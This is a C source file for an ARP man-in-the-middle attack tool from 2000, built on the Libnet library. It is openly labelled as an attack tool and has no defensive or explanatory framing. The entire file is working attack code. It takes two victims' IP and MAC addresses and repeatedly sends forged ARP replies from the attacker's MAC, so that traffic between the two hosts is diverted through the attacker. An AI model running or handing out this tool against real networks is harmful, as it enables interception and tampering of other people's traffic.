/*
 * ARP MITM attack tool. (c) xdr 2000
 * Idea from scut's arptool - Requires Libnet 1.00.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <libnet.h>

#define LINK_DEV	"eth0"
#define MAXBUFSIZE	1024
#define RECACHE_TIME	10

static char rcs_id[] = "$Id: arpmitm.c,v 1.2 2000/03/28 21:26:48 xdr Exp $";

struct arp_mitm {
	unsigned char ether_src[6];
	unsigned char ether_dst[6];
	unsigned long s_addr;
	unsigned long d_addr;
};

static struct arp_mitm arpmitm[2];
static unsigned char *pkt;

void cleanup(int ret)
{
	fprintf(stderr, "exiting...\n");
	libnet_destroy_packet(&pkt);
	exit(ret);
}
	
void banner( void )
{
	printf("\n/*\n"
	       " * ARP MITM attack tool. (c) xdr 2000\n"
	       " * %s\n"
	       " */\n", rcs_id);
}

void display_usage(char *string)
{
	fprintf(stderr,
	        "\nUsage: %s <ip1> <mac1> <ip2> <mac2> <mymac>\n", string);
	exit(EXIT_FAILURE);
}

void parse_mac(char *mac_string, unsigned char *mac)
{
  unsigned int tmp[6];
  int i;

	sscanf(mac_string, "%2x:%2x:%2x:%2x:%2x:%2x",
	       &tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5]);

	for(i = 0;i < 6;i++) mac[i] = tmp[i];
}

void setup_data_structure(char **args)
{
	parse_mac(args[5], arpmitm[0].ether_src);
	arpmitm[0].s_addr = inet_addr(args[1]);
	parse_mac(args[4], arpmitm[0].ether_dst);
	arpmitm[0].d_addr = inet_addr(args[3]);
	parse_mac(args[5], arpmitm[1].ether_src);
	arpmitm[1].s_addr = inet_addr(args[3]);
	parse_mac(args[2], arpmitm[1].ether_dst);
	arpmitm[1].d_addr = inet_addr(args[1]);
}

int main(int argc, char **argv)
{
  struct libnet_link_int *link;
  char error_buf[MAXBUFSIZE + 1];
  int i, c = 0;

	banner(); 
	if(argc != 6) display_usage(argv[0]); 

	if(libnet_init_packet(LIBNET_ETH_H + LIBNET_ARP_H, &pkt) == -1) {
		fprintf(stderr, "libnet_init_packet failed.\n");
		return EXIT_FAILURE;
	}

	if((link = libnet_open_link_interface(LINK_DEV, error_buf)) == NULL) {
		fprintf(stderr, "libnet_open_link_interface failed: %s.\n",
		        error_buf);
		return EXIT_FAILURE;
	}

	setup_data_structure(argv);

	printf("\n --- Starting ARP MITM ---\n"
	       "endpoint-1 (%s) at %s [ether] on %s\n"
	       "endpoint-2 (%s) at %s [ether] on %s\n"
	       " -------------------------\n\n",
	       argv[1], argv[2], LINK_DEV,
	       argv[3], argv[4], LINK_DEV);

	signal(SIGINT, cleanup);
	signal(SIGKILL, cleanup);

	for(;;) {
		printf("[0x%x]: Sending mitm to: ", c); fflush(stdout);
		for(i = 0;i < 2;i++) {
			usleep(300000);
			printf("endpoint-%d ", i + 1); fflush(stdout); 
			libnet_build_ethernet(arpmitm[i].ether_dst,
			                      arpmitm[i].ether_src,
		        	              ETHERTYPE_ARP, NULL, 0, pkt);

			libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP,
			                 6, 4, ARPOP_REPLY,
			                 arpmitm[i].ether_src,
		        	         (unsigned char *)&arpmitm[i].s_addr,
		                	 arpmitm[i].ether_dst,
			                 (unsigned char *)&arpmitm[i].d_addr, 
			                 NULL, 0, pkt + LIBNET_ETH_H);

			libnet_write_link_layer(link, LINK_DEV, pkt,
			                        LIBNET_ETH_H + LIBNET_ARP_H);
		}

		printf("\n");	
		sleep(RECACHE_TIME);
		c++;
	}

	return EXIT_SUCCESS;
}
